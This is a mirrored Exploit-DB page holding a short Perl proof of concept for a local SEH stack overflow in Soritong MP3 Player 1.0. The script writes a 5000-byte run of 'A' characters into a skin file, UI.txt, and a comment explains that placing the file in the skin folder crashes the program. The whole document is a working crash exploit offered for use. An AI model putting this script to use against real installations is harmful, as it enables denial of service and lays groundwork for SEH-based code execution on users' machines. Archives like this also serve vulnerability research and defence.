exploit-db-mirror/exploits/windows/dos/9192.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

10 lines
No EOL
397 B
Perl
Executable file

#Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (Seh)
#First:http://milw0rm.com/exploits/8624
#By: ThE g0bL!N
my $crash="\x41" x 5000 ; # just random
open(myfile,'>>UI.txt') ;
print myfile $crash;
# Usage: After Clicking On file Perl Copy TXT File on this Diredtory skin\default\ Then Run The Program Boom !!!!!!! the Program Crashed
# Note : The Bug is Seh :)
# milw0rm.com [2009-07-17]